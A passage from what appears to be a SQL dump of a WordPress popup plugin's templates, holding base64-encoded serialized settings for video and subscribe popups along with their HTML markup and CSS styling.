c3ViX2F3ZWJlcl9saXN0bmFtZSI7czowOiIiO3M6MjE6InN1Yl9hd2ViZXJfYWR0cmFja2luZyI7czowOiIiO3M6MjE6InN1Yl9tYWlsY2hpbXBfYXBpX2tleSI7czowOiIiO3M6MjU6InN1Yl9tYWlsY2hpbXBfZ3JvdXBzX2Z1bGwiO3M6MDoiIjtzOjEwOiJzdWJfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo4OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO3M6MTA6InNldF9wcmVzZXQiO3M6MDoiIjt9czo1OiJlbWFpbCI7YTo4OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MTA6InNldF9wcmVzZXQiO3M6MDoiIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6OToiYmxhY2tsaXN0IjtzOjA6IiI7czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo3OiJTSUdOLVVQIjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19zdWJqZWN0IjtzOjI4OiJOZXcgc3Vic2NyaWJlciBvbiBbc2l0ZW5hbWVdIjtzOjE1OiJzdWJfbmV3X21lc3NhZ2UiO3M6MTI5OiJZb3UgaGF2ZSBuZXcgc3Vic2NyaWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIGlzIHN1YnNjcmliZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6MTI6ImNvbnRhY3RfZm9ybSI7czoyOiIxOSI7czoxMjoic3RhdF9nYV9jb2RlIjtzOjA6IiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mzp7czo5OiJiZ19udW1iZXIiO3M6MToiMyI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIwIjtzOjIxOiJ2aWRlb19oZWlnaHRfYXNfcG9wdXAiO3M6MToiMSI7fX0=','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div class=\"ppsPopupVideo \">\r\n				[video_html]\r\n			</div>\r\n			<div style=\"clear: both;\"></div>\r\n		</div>\r\n		<div class=\"ppsRightCol\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n				<div style=\"clear: both;\"></div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			[if enb_sm]\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n			[if enb_foot_note]\r\n				<div class=\"ppsFootNote\">\r\n				[foot_note]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 0;\r\n  	font-family: arial;\r\n	font-size: 13px;\r\n	line-height: normal;\r\n	font-weight: normal;\r\n	color: #015050;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] iframe {\r\n	width: 100% !important;\r\n	margin: 0;\r\n    padding: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n	display: table-cell;\r\n	vertical-align: middle;\r\n	\r\n	{% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 66%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n\r\n	[if bg_type_0 == \"color\"]\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\", endColorstr=\"[bg_color_0]\",GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \"img\"]\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n	background-position: center top;\r\n	[else]\r\n	background: none;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	display: table-cell;\r\n  	width: 34%;\r\n  	height: 100%;\r\n  	vertical-align: middle;\r\n	padding: 15px 0;\r\n	margin: 0;\r\n	\r\n  	[if bg_type_1 == \"color\"]\r\n  	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}), color-stop(100%, [bg_color_1])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}\", endColorstr=\"[bg_color_1]\",GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_1 == \"img\"]\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n	background-position: center top;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 15px 30px 0;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input::-webkit-input-placeholder { /* Chrome/Opera/Safari */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input::-moz-placeholder { /* Firefox 19+ */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input:-ms-input-placeholder { /* IE 10+ */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input:-moz-placeholder { /* Firefox 18- */\r\n    color: #ccc;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea::-webkit-input-placeholder { /* Chrome/Opera/Safari */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea::-moz-placeholder { /* Firefox 19+ */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea:-ms-input-placeholder { /* IE 10+ */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea:-moz-placeholder { /* Firefox 18- */\r\n    color: #ccc;\r\n}\r\n/*For all Elements*/\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"password\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: arial;\r\n	font-size: 16px;\r\n	font-weight: normal;\r\n	line-height: normal;\r\n	color: #aaa;\r\n	text-align:center;\r\n	width: 100%;\r\n	-webkit-border-radius: 5px;\r\n	-moz-border-radius: 5px;\r\n	border-radius: 5px;\r\n	border: 0px solid transparent;\r\n	display:block;\r\n    \r\n    margin: 10px 0 0;\r\n	padding: 0 10px 0 10px;\r\n	height: 40px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	height: auto;\r\n	padding-top: 9px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeForm input:first-child {\r\n	margin-top: 0px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select  {\r\n	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  {\r\n	display: block;\r\n	font-family: arial;\r\n	font-size: 16px;\r\n	font-weight: normal;\r\n	line-height: normal;\r\n	color: #015050;\r\n	\r\n	margin: 10px 0 0;\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  span {\r\n	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"][name=\"name\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/user-black-icon.png\");\r\n	background-position: 12px center;\r\n	background-repeat: no-repeat;\r\n	background-size: 16px auto;\r\n	padding: 0 25px 0 35px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/email-black-icon.png\");\r\n	background-position: 11px center;\r\n	background-repeat: no-repeat;\r\n	background-size: 18px auto;\r\n	padding: 0 25px 0 35px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"submit\"] {\r\n	display: block;\r\n	font-family: arial;\r\n	font-size: 17px;\r\n	font-weight: bold;\r\n	line-height: normal;\r\n	color: #fff;\r\n  	cursor: pointer;\r\n	margin: 10px 0 0;\r\n	-webkit-border-radius: 5px;\r\n	-moz-border-radius: 5px;\r\n	border-radius: 5px;\r\n	border: 0px solid transparent;\r\n	width: 100%;\r\n	height: 50px;\r\n	\r\n  	[if bg_type_2 == \"color\"]\r\n  	background: [bg_color_2] 100%;\r\n  	[elseif bg_type_2 == \"img\"]\r\n  	background: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #015050;\r\n	font-family: arial;\r\n	font-size: 30px;\r\n	line-height: 40px;\r\n	font-weight: bold;\r\n	margin: 0 15px 15px;\r\n	padding: 0;\r\n	text-align: center;\r\n\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupVideo {\r\n  	width: 100%;\r\n  	line-height: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSuccessMsg {\r\n	color: #015050 !important;\r\n	font-weight: bold;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg {\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n	color: #015050;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: normal;\r\n	font-weight: bold;\r\n    line-height: 14px;\r\n  	margin: 15px 30px 5px;\r\n	padding: 0;\r\n	text-align: center;\r\n}','2016-230-5-video-list-prev.png',1,1,1,3,0,0,0,'2015-01-10 17:59:43',1,0),(6,'Video Classy',1,0,'YTozOntzOjQ6Im1haW4iO2E6MjQ6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjt9czozOiJ0cGwiO2E6NzE6e3M6OToidmlkZW9fdXJsIjtzOjQzOiJodHRwczovL3d3dy55b3V0dWJlLmNvbS93YXRjaD92PW5LSXU5eWVuNW5jIjtzOjU6IndpZHRoIjtzOjM6IjYzMCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czo2OiJoZWlnaHQiO3M6MzoiNDgwIjtzOjE0OiJoZWlnaHRfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNlY2UwZDEiO3M6OToiYmdfdHlwZV8xIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18xIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjN2ZiNmNiIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzU1NTU1NSI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzk5OTk5OSI7czo5OiJjbG9zZV9idG4iO3M6MTE6ImNsYXNzeV9ncmV5IjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6NToibGFiZWwiO3M6MTg6Ikxvb2sgb3VyIG5ldyB2aWRlbyI7czo5OiJmb290X25vdGUiO3M6MDoiIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfZ3JfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfdXJsIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV9rZXkiO3M6MDoiIjtzOjE4OiJzdWJfYXJfZm9ybV9hY3Rpb24iO3M6MDoiIjtzOjEwOiJzdWJfc2dhX2lkIjtzOjA6IiI7czoxNToic3ViX3NnYV9saXN0X2lkIjtzOjA6IiI7czoyMToic3ViX3NnYV9hY3RpdmF0ZV9jb2RlIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fXM6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo4OiJTaWduLVVwISI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfbWVzc2FnZSI7czoxMjk6IllvdSBoYXZlIG5ldyBzdWJzY3JpYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgdXMgc3Vic2NyaWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czoxODoibG9naW5fcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoxNToibG9naW5fYnRuX2xhYmVsIjtzOjU6IkxvZ2luIjtzOjE2OiJyZWdfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyMzoicmVnX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTM6InJlZ19idG5fbGFiZWwiO3M6ODoiUmVnaXN0ZXIiO3M6MTA6InJlZ19maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InJlZ190eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJyZWdfdHh0X3N1Y2Nlc3MiO3M6Mjc6IlRoYW5rIHlvdSBmb3IgcmVnaXN0cmF0aW9uISI7czoyMToicmVnX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHJlZ2lzdHJhdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTY6IllvdSByZWdpc3RlcmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHJlZ2lzdHJhdGlvbi4gSWYgeW91IGRpZCBub3QgcmVnaXN0ZXIgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxMjE6IllvdSBoYXZlIG5ldyBtZW1iZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBtZW1iZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO31zOjEwOiJvcHRzX2F0dHJzIjthOjQ6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjIiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMCI7czoyMDoidmlkZW9fd2lkdGhfYXNfcG9wdXAiO3M6MToiMSI7czoyMToidmlkZW9faGVpZ2h0X2FzX3BvcHVwI